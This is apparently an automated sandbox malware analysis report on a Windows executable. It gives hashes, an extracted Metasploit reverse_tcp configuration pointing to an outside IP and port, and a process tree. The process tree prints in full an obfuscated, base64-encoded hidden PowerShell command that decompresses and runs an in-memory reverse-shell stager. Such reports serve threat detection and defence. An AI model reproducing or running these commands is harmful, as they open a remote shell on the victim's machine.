Analysis
-
max time kernel
148s -
max time network
148s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
21/01/2024, 23:22
Static task
static1
Behavioral task
behavioral1
Sample
6e1a88382a9a78105094ed412b1a9038.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
6e1a88382a9a78105094ed412b1a9038.exe
Resource
win10v2004-20231215-en
General
-
Target
6e1a88382a9a78105094ed412b1a9038.exe
-
Size
297KB
-
MD5
6e1a88382a9a78105094ed412b1a9038
-
SHA1
5ec88111ba9f5c96e5943a0f0d7ea169c3de97f3
-
SHA256
64dac5ded715c47d9e36381bc87e6205ad02ffbab5b4f516a6bc91bb08fb4b68
-
SHA512
72a01c0733a6b268953c538a23603c9a3710d72ba065c66d512738b73b688f61155ba78e2929e63aa82363c1d0b2bf6bcbf3d74ae78efe29cecab954dea395ea
-
SSDEEP
6144:+9Ckr91bn+UdW5oPGNZuaReIn1mN/YaINny:+ZbnHx8uaR7nEKNy
Malware Config
Extracted
metasploit
windows/reverse_tcp
10.0.0.31:4444
Signatures
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2380 powershell.exe 2692 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2380 powershell.exe Token: SeDebugPrivilege 2692 powershell.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2180 wrote to memory of 2368 2180 6e1a88382a9a78105094ed412b1a9038.exe 29 PID 2180 wrote to memory of 2368 2180 6e1a88382a9a78105094ed412b1a9038.exe 29 PID 2180 wrote to memory of 2368 2180 6e1a88382a9a78105094ed412b1a9038.exe 29 PID 2180 wrote to memory of 2368 2180 6e1a88382a9a78105094ed412b1a9038.exe 29 PID 2368 wrote to memory of 2380 2368 cmd.exe 30 PID 2368 wrote to memory of 2380 2368 cmd.exe 30 PID 2368 wrote to memory of 2380 2368 cmd.exe 30 PID 2368 wrote to memory of 2380 2368 cmd.exe 30 PID 2380 wrote to memory of 2692 2380 powershell.exe 31 PID 2380 wrote to memory of 2692 2380 powershell.exe 31 PID 2380 wrote to memory of 2692 2380 powershell.exe 31 PID 2380 wrote to memory of 2692 2380 powershell.exe 31
Processes
-
C:\Users\Admin\AppData\Local\Temp\6e1a88382a9a78105094ed412b1a9038.exe"C:\Users\Admin\AppData\Local\Temp\6e1a88382a9a78105094ed412b1a9038.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2180 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c start /b /min p^o^wer^sh^ell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwAnAEgANABzAEkAQQBGAFgAbABCADIARQBDAEEANwBWAFcAKwAyACsAYgBTAEIARAArAE8AWgBIAHkAUAA2AEQASwBFAHEAQQA2AEIAagA4AHUAYQBTAEoAVgB1AGcAVwBNADcAUwBSADIALwBJAGoAZgB0AGEAbwBOAHIARwBIAGoAaABYAFYAZwBzAFUATgA2AC8AZAA5AHYAcwBFADIAYQBxAHUAbABkAGUAOQBJAGgAUAAvAFkAeABNAHoAdgB6AHoAVABlAHoATABKAFAAUQBFAFoAUwBIADAAbgAyAEwAUwBWADkATwBqAG8AKwA2AE8ATQBLAEIAcABCAFQAOAB5AG4ATgBSAEsAcABDAHIAaQAwADIAZwBIAGgAMwBCAFIAaQBFACsANgA1AHgASgBIAHkAVgBsAGoAdABaAHIAaQB3AGUAWQBoAG8AdgBMAFMAegBPAEoASQBoAEsASwAvAGIAegBVAEkAQQBMAEYATQBRAG4AdQBHAFMAVwB4AG8AawBwAC8AUwBXAE8AZgBSAE8AVAAwADkAdgA2AEIATwBFAEwANgBJAGgAVQArAGwAeABxAE0AMwAyAE4AMgBFAEUAdABOADcAUABoAEUATwBrAFcAaABtACsAMwBkAGMAQQBkAG4AMwBwAFEARwBhADAAYQBGAEkAbgAvADYASgBLAHYAegAwAC8ASwBpAFYASAA5AE0ATQBJAHMAVgBlAFoARABHAGcAZwBRAGwAbAB6AEYAWgBsAGIANgBxADIAWQBGADMANgBaAG8AbwBjAHAAcwA2AEUAWQAvADUAVQBwAFQARwBOAEsAeABXAFMAcwBNAHcAeABrAHYAUwBBAFcAcwBiADAAaQBiAEMANQAyADQAcwBxAHgAQQBGAGYAQwBJAGkAawBpAGkAVQBkAHYARgBrAEIAdgBiAGIAaQBnAHoARABiAHMAUQBkADUATABvAFIAaQBXAE8ANQBLAE0AMAB6ADAALwBQAEYANABrADkAbABmAGoAaQAzAG4ANABTAEMAQgBxAFQAVQBDAGcAVwBKACsASABwAEEAbwBnADEAMQBTAEYAeABxADQAdABCAGwAcABFACsAVwBDADkAQQBhAGkASQBpAEcAMwBrAEoAVgBRAFcAegBEAFYAMABRAHAAaABBAGwAagBSAGUAbAAzAHoAQwBnAGQAcwBzADEAUgArADEAVQBsADUAYgBVAFMAUwBIAFYARgBwAEIAWQBoAGsAMgAvAEUAMgBlAFoAdQB3AHMAaABlAFUAMwA3AEQAMABTAHoANwBLAGoAdwB2AEQAQQBEAG8AdgBwADQAYwBuAHgAdwB2AGMANwBxAGsAbgAvAHMAUAByAC8AawBDAG8ANgBQADUAYgBrAHoAQQBQAGEAWABMAFkANwBxAFQAKwB5AGoAcABSAGEAawBOAEIAMgBIAEIAbwB4AFMAbQBoAGIAcwBvAEkAZQByAGkAQgBWAHkAcAA4AEcAZwBWAGYANgA1AGQAegBrAFYAQgBNAE8AMQBIAHMARABJAGYAYwBlAG8AdQBRAE8ATwBRAHoAbwBLAC8AeQBsAFoALwBUAGsAcQBMAEwARwBsAEkAcgBEAFQARQBBAFgAVgB5ADMAaQBsAHYASQBVAHkAVwBqAE8AegBDAEsAKwBWAGkASABmAEIASQBrAFEAOABiAHgATABVAEkASQB4ADQAVwBHAFcAWgBaAG8AbgA5AFEAcQB3AGQAVQB2AE8AZwBhAEMAVwBVAHUAaQBaAEEARABXAFkAcgBCAEsAMABpAGcAKwByADAAegArAHoAUQBvAGMAaQB0AHMAawB3AEQAZwAyAGMAKwBCAGUAWQBVAGwAcwBKADMAawAwAGcAZQBHAHAALwBuAHAAMgBSAHkARQBaAEoAUABoAE8AQwA1AEsAMwBRAFQASwB6AFMAbABLAEEANABJAFoAYwBZAHMAUwBDAG0ATgA2ADIARQBLAEoANABMAHUAaAAvAE0AMwBkAGQAcwBJAEUAZABYAEEAcwBjAG4ATQBMAGQAWQAvAGkANABUAFMAVABoADcARwBJAEUAZwBmAHkAQgBaAEgAZgBEAGQAYgBFAG8AWgBoAGwAUQBCAFMAbABKAG4AVwBKAGsAUQA2AG8AbAA1ADgAcQB2AHcAbQBEAGkAUgBtAEQARQBnAEIATABHADAAZwBEAHIARwBUAGgARAAwAFQARwBnAGcAZwBjAGgASQB5AHIAcABRAEUAUgByAFcARABOAFMAQQBBAFMAdQA1AHEAMwBHAGYAYQBnAHcAZwA4ADAAMwA1AEUARwBlADgAUwBWAHYALwBjAHUASgAvAEcAZQBzAFIAawBLAGUAZgBpAHYAZgBJAFAAVQBEAGgAZwBYAFIAVwBsAEUASQB3AEcATgBJADAATQBVAHkAUABOAGYAVABuADcAVgBMADgAQQBIAE0AeQBJAEgALwBKAFcAOABJAHUAWgBHAEsAagBJAGUARgAwAEsAZQAwAGYAQQBBAHgAaQA3ADAAUwBFAEQAWQBkAHMAUQBEAEEAOABmAGsAcgBMAGIAdgBDADgAbwA3ADcAWgBaADIARQBUAHoAVABWAHMAagBhADcAdABXAEsAbABsAHQAYgArAEwAYgBoAE8ANwBUAE8AMwBlAHUAcgBoADYAWgBHAHEAeQAzAGUAZABzAHkANAAyADcAQQAvAEkATAByADEAdABzADYASABEAG4ATABjAEsANQBkAGMARABFAFkAMQBNAGEAaQAzAGgATgBsAEYAegBSADcAVgBqAFoAcgB2AEcAUAByAGQAYgB1AHgATgBoAHkAMAB4AGIAYQBIAG0AbgBlADgAdwB2AFYAdABmAFAAVwBtADEAVwBLAGYAYgA1AHIAagB0AFcATQBiAHoAdABoAEkARABHAFcAdQAxADUAawBSAEgAMQBXAHIAdAB0AHEAcQB2AEEATABJAHAATABYAHMAcgA1AEgAWQBDAHUAbgAyADYAZwBUAEUAMAB3AE4AcwBiAG8AeABVAGIAZQBvAHYAVgByADgAegArAC8AYgBoAGkAegA4AGEAcwBxAGQAVgBzAGYAegBuAG0AOABlAEIAcwBhAG0AbQBhAGQAdQBGAGkAcQA1ADAAaQBaAEgAQwAzADIAawA0AG4ANQBUADYALwBhAHoAcQBCAFUAUQB1ADUAZABtAEgAVwBWAHEAaQBPAGsAQgBuAFcAUgA3AGIAQgByADYAZABHAGgATAByAGEAQwBIAHQAcgBiAG4AbwBJAE4AUwB1AGUAaQBRAHoAYgBvAFcAVABXAEcAOQBwAEcAcgAyAGMAYgBhAE4AaAA0AGUATABRAHUATgBFACsANwBHAEUAKwB3AGIANAB4AEgARgBUAHAAYgBUAC8AbwArAHoATwAxAHQAcwAzAGUAdAA2AGIAVwBXAFMANQA3ADUAYgBBAHYAQQBOAFQAagBDAFgAaAA5AGsAUABMAFAAaQArAEUAdQBRAHMAZAA0AGoANAAzADIASAB4AHgAVwA4AE0AagBnAHkAUQBNAGEAZQBQAGEASwBHAFAAMQAzAGIAWABRAGIANwBkADgATQBLAFIAeQBQAFcAbQBXAEIAMABNADAAdAB0AFQAUwB0AFAAdQB6AFgAVQAxAFAAbQA0ADQAYQBFAGUAaQBHAFAAUAA2AEcARQBVAGIANgB4AG4AUwB5AHUAUABYAE8ANgBPAC8AKwBoAE0AbAA5AHAAbwB3AHMANAAxAHkAKwB4ADEALwBVAGsAVwBzADcAWQBPAHMAdAA5AHQAMAA3AHAAMgBaAHUAVwB0AGMAMwB2ACsANABXAFoATQBSAHcARgBIAFEAMAAwAGIAdgBjAHYANABBAG8AUQBwAFAASQBTAHYAbQBQAEMAegB0AHQAMwBHAFUAZQB4AGoAQgBnAHkAQgBmAHAAeQBYAG8AcwAwAGoAKwA5AEIAaAB1ADUAeABtAEcAbwBxAFMAWABjAHcAcgBFAG8AVwBFAHcAYgBVAEcARgAxADkATwBhAHMAUQBZAGQANwBJAEcAdgAyAHYARgBjAEwAbgBzAFcAMwA1ADIAQQB3ADEAaABXAEsAMgA4AE8AVgBLAGwARgAwAEgAMQBXACsAUABQAGwAeQA0AHYAWgArAEEAawAxAEUAbgBJAFMAegBjAGsAOQBJAFIAZgAxAEoAKwBxAHUAZwA0ADkAWABIACsAcQA2AFIARABnAHIANABkAGwAOABuAFUASwBOAHcAcABZAEEAMgAzAEEAWgBHACsAVgA3AGEAeQBxAFcAZQBVAFUATgB1AGgALwB4AGUAbABRAHIARAA3ADgAdQBmACsARwAwADcAZQAxAGYAOQBqADkASgBlAHoAMABZAGgAYgByAEQANAB2AGYATAAvAHcAVwBrAEwAOABiADkAeABoAFQAQQBZAEkARABhAEQAYQBNADcARwArADQAdAA4AE0ALwBNAE8ATABWAC8AYgA5AEIAawBPAC8AbAA0AGMAbABlADMAMgA0AFQAYwBkAHEAQgBsADQASwBUADQANwA4AEIALwBiAGYAQwBaAFMAawBLAEEAQQBBAD0AJwAnACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA2⤵
- Suspicious use of WriteProcessMemory
PID:2368 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwAnAEgANABzAEkAQQBGAFgAbABCADIARQBDAEEANwBWAFcAKwAyACsAYgBTAEIARAArAE8AWgBIAHkAUAA2AEQASwBFAHEAQQA2AEIAagA4AHUAYQBTAEoAVgB1AGcAVwBNADcAUwBSADIALwBJAGoAZgB0AGEAbwBOAHIARwBIAGoAaABYAFYAZwBzAFUATgA2AC8AZAA5AHYAcwBFADIAYQBxAHUAbABkAGUAOQBJAGgAUAAvAFkAeABNAHoAdgB6AHoAVABlAHoATABKAFAAUQBFAFoAUwBIADAAbgAyAEwAUwBWADkATwBqAG8AKwA2AE8ATQBLAEIAcABCAFQAOAB5AG4ATgBSAEsAcABDAHIAaQAwADIAZwBIAGgAMwBCAFIAaQBFACsANgA1AHgASgBIAHkAVgBsAGoAdABaAHIAaQB3AGUAWQBoAG8AdgBMAFMAegBPAEoASQBoAEsASwAvAGIAegBVAEkAQQBMAEYATQBRAG4AdQBHAFMAVwB4AG8AawBwAC8AUwBXAE8AZgBSAE8AVAAwADkAdgA2AEIATwBFAEwANgBJAGgAVQArAGwAeABxAE0AMwAyAE4AMgBFAEUAdABOADcAUABoAEUATwBrAFcAaABtACsAMwBkAGMAQQBkAG4AMwBwAFEARwBhADAAYQBGAEkAbgAvADYASgBLAHYAegAwAC8ASwBpAFYASAA5AE0ATQBJAHMAVgBlAFoARABHAGcAZwBRAGwAbAB6AEYAWgBsAGIANgBxADIAWQBGADMANgBaAG8AbwBjAHAAcwA2AEUAWQAvADUAVQBwAFQARwBOAEsAeABXAFMAcwBNAHcAeABrAHYAUwBBAFcAcwBiADAAaQBiAEMANQAyADQAcwBxAHgAQQBGAGYAQwBJAGkAawBpAGkAVQBkAHYARgBrAEIAdgBiAGIAaQBnAHoARABiAHMAUQBkADUATABvAFIAaQBXAE8ANQBLAE0AMAB6ADAALwBQAEYANABrADkAbABmAGoAaQAzAG4ANABTAEMAQgBxAFQAVQBDAGcAVwBKACsASABwAEEAbwBnADEAMQBTAEYAeABxADQAdABCAGwAcABFACsAVwBDADkAQQBhAGkASQBpAEcAMwBrAEoAVgBRAFcAegBEAFYAMABRAHAAaABBAGwAagBSAGUAbAAzAHoAQwBnAGQAcwBzADEAUgArADEAVQBsADUAYgBVAFMAUwBIAFYARgBwAEIAWQBoAGsAMgAvAEUAMgBlAFoAdQB3AHMAaABlAFUAMwA3AEQAMABTAHoANwBLAGoAdwB2AEQAQQBEAG8AdgBwADQAYwBuAHgAdwB2AGMANwBxAGsAbgAvAHMAUAByAC8AawBDAG8ANgBQADUAYgBrAHoAQQBQAGEAWABMAFkANwBxAFQAKwB5AGoAcABSAGEAawBOAEIAMgBIAEIAbwB4AFMAbQBoAGIAcwBvAEkAZQByAGkAQgBWAHkAcAA4AEcAZwBWAGYANgA1AGQAegBrAFYAQgBNAE8AMQBIAHMARABJAGYAYwBlAG8AdQBRAE8ATwBRAHoAbwBLAC8AeQBsAFoALwBUAGsAcQBMAEwARwBsAEkAcgBEAFQARQBBAFgAVgB5ADMAaQBsAHYASQBVAHkAVwBqAE8AegBDAEsAKwBWAGkASABmAEIASQBrAFEAOABiAHgATABVAEkASQB4ADQAVwBHAFcAWgBaAG8AbgA5AFEAcQB3AGQAVQB2AE8AZwBhAEMAVwBVAHUAaQBaAEEARABXAFkAcgBCAEsAMABpAGcAKwByADAAegArAHoAUQBvAGMAaQB0AHMAawB3AEQAZwAyAGMAKwBCAGUAWQBVAGwAcwBKADMAawAwAGcAZQBHAHAALwBuAHAAMgBSAHkARQBaAEoAUABoAE8AQwA1AEsAMwBRAFQASwB6AFMAbABLAEEANABJAFoAYwBZAHMAUwBDAG0ATgA2ADIARQBLAEoANABMAHUAaAAvAE0AMwBkAGQAcwBJAEUAZABYAEEAcwBjAG4ATQBMAGQAWQAvAGkANABUAFMAVABoADcARwBJAEUAZwBmAHkAQgBaAEgAZgBEAGQAYgBFAG8AWgBoAGwAUQBCAFMAbABKAG4AVwBKAGsAUQA2AG8AbAA1ADgAcQB2AHcAbQBEAGkAUgBtAEQARQBnAEIATABHADAAZwBEAHIARwBUAGgARAAwAFQARwBnAGcAZwBjAGgASQB5AHIAcABRAEUAUgByAFcARABOAFMAQQBBAFMAdQA1AHEAMwBHAGYAYQBnAHcAZwA4ADAAMwA1AEUARwBlADgAUwBWAHYALwBjAHUASgAvAEcAZQBzAFIAawBLAGUAZgBpAHYAZgBJAFAAVQBEAGgAZwBYAFIAVwBsAEUASQB3AEcATgBJADAATQBVAHkAUABOAGYAVABuADcAVgBMADgAQQBIAE0AeQBJAEgALwBKAFcAOABJAHUAWgBHAEsAagBJAGUARgAwAEsAZQAwAGYAQQBBAHgAaQA3ADAAUwBFAEQAWQBkAHMAUQBEAEEAOABmAGsAcgBMAGIAdgBDADgAbwA3ADcAWgBaADIARQBUAHoAVABWAHMAagBhADcAdABXAEsAbABsAHQAYgArAEwAYgBoAE8ANwBUAE8AMwBlAHUAcgBoADYAWgBHAHEAeQAzAGUAZABzAHkANAAyADcAQQAvAEkATAByADEAdABzADYASABEAG4ATABjAEsANQBkAGMARABFAFkAMQBNAGEAaQAzAGgATgBsAEYAegBSADcAVgBqAFoAcgB2AEcAUAByAGQAYgB1AHgATgBoAHkAMAB4AGIAYQBIAG0AbgBlADgAdwB2AFYAdABmAFAAVwBtADEAVwBLAGYAYgA1AHIAagB0AFcATQBiAHoAdABoAEkARABHAFcAdQAxADUAawBSAEgAMQBXAHIAdAB0AHEAcQB2AEEATABJAHAATABYAHMAcgA1AEgAWQBDAHUAbgAyADYAZwBUAEUAMAB3AE4AcwBiAG8AeABVAGIAZQBvAHYAVgByADgAegArAC8AYgBoAGkAegA4AGEAcwBxAGQAVgBzAGYAegBuAG0AOABlAEIAcwBhAG0AbQBhAGQAdQBGAGkAcQA1ADAAaQBaAEgAQwAzADIAawA0AG4ANQBUADYALwBhAHoAcQBCAFUAUQB1ADUAZABtAEgAVwBWAHEAaQBPAGsAQgBuAFcAUgA3AGIAQgByADYAZABHAGgATAByAGEAQwBIAHQAcgBiAG4AbwBJAE4AUwB1AGUAaQBRAHoAYgBvAFcAVABXAEcAOQBwAEcAcgAyAGMAYgBhAE4AaAA0AGUATABRAHUATgBFACsANwBHAEUAKwB3AGIANAB4AEgARgBUAHAAYgBUAC8AbwArAHoATwAxAHQAcwAzAGUAdAA2AGIAVwBXAFMANQA3ADUAYgBBAHYAQQBOAFQAagBDAFgAaAA5AGsAUABMAFAAaQArAEUAdQBRAHMAZAA0AGoANAAzADIASAB4AHgAVwA4AE0AagBnAHkAUQBNAGEAZQBQAGEASwBHAFAAMQAzAGIAWABRAGIANwBkADgATQBLAFIAeQBQAFcAbQBXAEIAMABNADAAdAB0AFQAUwB0AFAAdQB6AFgAVQAxAFAAbQA0ADQAYQBFAGUAaQBHAFAAUAA2AEcARQBVAGIANgB4AG4AUwB5AHUAUABYAE8ANgBPAC8AKwBoAE0AbAA5AHAAbwB3AHMANAAxAHkAKwB4ADEALwBVAGsAVwBzADcAWQBPAHMAdAA5AHQAMAA3AHAAMgBaAHUAVwB0AGMAMwB2ACsANABXAFoATQBSAHcARgBIAFEAMAAwAGIAdgBjAHYANABBAG8AUQBwAFAASQBTAHYAbQBQAEMAegB0AHQAMwBHAFUAZQB4AGoAQgBnAHkAQgBmAHAAeQBYAG8AcwAwAGoAKwA5AEIAaAB1ADUAeABtAEcAbwBxAFMAWABjAHcAcgBFAG8AVwBFAHcAYgBVAEcARgAxADkATwBhAHMAUQBZAGQANwBJAEcAdgAyAHYARgBjAEwAbgBzAFcAMwA1ADIAQQB3ADEAaABXAEsAMgA4AE8AVgBLAGwARgAwAEgAMQBXACsAUABQAGwAeQA0AHYAWgArAEEAawAxAEUAbgBJAFMAegBjAGsAOQBJAFIAZgAxAEoAKwBxAHUAZwA0ADkAWABIACsAcQA2AFIARABnAHIANABkAGwAOABuAFUASwBOAHcAcABZAEEAMgAzAEEAWgBHACsAVgA3AGEAeQBxAFcAZQBVAFUATgB1AGgALwB4AGUAbABRAHIARAA3ADgAdQBmACsARwAwADcAZQAxAGYAOQBqADkASgBlAHoAMABZAGgAYgByAEQANAB2AGYATAAvAHcAVwBrAEwAOABiADkAeABoAFQAQQBZAEkARABhAEQAYQBNADcARwArADQAdAA4AE0ALwBNAE8ATABWAC8AYgA5AEIAawBPAC8AbAA0AGMAbABlADMAMgA0AFQAYwBkAHEAQgBsADQASwBUADQANwA4AEIALwBiAGYAQwBaAFMAawBLAEEAQQBBAD0AJwAnACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2380 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIAFXlB2ECA7VW+2+bSBD+OZHyP6DKEqA6Bj8uaSJVugWM7SR2/IjftaoNrGHjhXVgsUN6/d9vsE2aqulde9IhP/YxMzvzzTezLJPQEZSH0n2LSV9Ojo+6OMKBpBT8ynNRKpCri02gHh3BRiE+65xJHyVljtZriweYhovLSzOJIhKK/bzUIALFMQnuGSWxokp/SWOfROT09v6BOEL6IhU+lxqM32N2EEtN7PhEOkWhm+3dcAdn3pQGa0aFIn/6JKvz0/KiVH9MMIsVeZDGggQllzFZlb6q2YF36Zoocps6EY/5UpTGNKxWSsMwxkvSAWsb0ibC524sqxAFfCIikiiUdvFkBvbbigzDbsQd5LoRiWO5KM0z0/PF4k9lfji3n4SCBqTUCgWJ+HpAog11SFxq4tBlpE+WC9AaiIiG3kJVQWzDV0QphAljRel3zCgdss1R+1Ul5bUSSHVFpBYhk2/E2eZuwsheU37D0Sz7KjwvDADovp4cnxwvc7qkn/sPr/kCo6P5bkzAPaXLY7qT+yjpRakNB2HBoxSmhbsoIeriBVyp8GgVf65dzkVBMO1HsDIfceouQOOQzoK/ylZ/TkqLLGlIrDTEAXVy3ilvIUyWjOzCK+ViHfBIkQ8bxLUIIx4WGWZZon9QqwdUvOgaCWUuiZADWYrBK0ig+r0z+zQocitskwDg2c+BeYUlsJ3k0geGp/np2RyEZJPhOC5K3QTKzSlKA4IZcYsSCmN62EKJ4Luh/M3ddsIEdXAscnMLdY/i4TSTh7GIEgfyBZHfDdbEoZhlQBSlJnWJkQ6ol58qvwmDiRmDEgBLG0gDrGThD0TGgggchIyrpQERrWDNSAASu5q3Gfagwg8035EGe8SVv/cuJ/GesRkKefivfIPUDhgXRWlEIwGNI0MUyPNfTn7VL8AHMyIH/JW8IuZGKjIeF0Ke0fAAxi70SEDYdsQDA8fkrLbvC8o77ZZ2ETzTVsja7tWKlltb+LbhO7TO3eurh6ZGqy3edsy427A/ILr1ts6HDnLcK5dcDEY1Mai3hNlFzR7VjZrvGPrdbuxNhy0xbaHmne8wvVtfPWm1WKfb5rjtWMbzthIDGWu15kRH1WrttqqvALIpLXsr5HYCun26gTE0wNsboxUbeovVr8z+/bhiz8asqdVsfznm8eBsammaduFiq50iZHC32k4n5T6/azqBUQu5dmHWVqiOkBnWR7bBr6dGhLraCHtrbnoINSueiQzboWTWG9pGr2cbaNh4eLQuNE+7GE+wb4xHFTpbT/o+zO1ts3et6bWWS575bAvANTjCXh9kPLPi+EuQsd4j432HxxW8MjgyQMaePaKGP13bXQb7d8MKRyPWmWB0M0ttTStPuzXU1Pm44aEeiGPP6GEUb6xnSyuPXO6O/+hMl9pows41y+x1/UkWs7YOst9t07p2ZuWtc3v+4WZMRwFHQ00bvcv4AoQpPISvmPCztt3GUexjBgyBfpyXos0j+9Bhu5xmGoqSXcwrEoWEwbUGF19OasQYd7IGv2vFcLnsW352Aw1hWK28OVKlF0H1W+PPly4vZ+Ak1EnISzck9IRf1J+qug49XH+q6RDgr4dl8nUKNwpYA23AZG+V7ayqWeUUNuh/xelQrD78uf+G07e1f9j9Jez0YhbrD4vfL/wWkL8b9xhTAYIDaDaM7G+4t8M/MOLV/b9BkO/l4cle324TcdqBl4KT478B/bfCZSkKAAA='))),[System.IO.Compression.CompressionM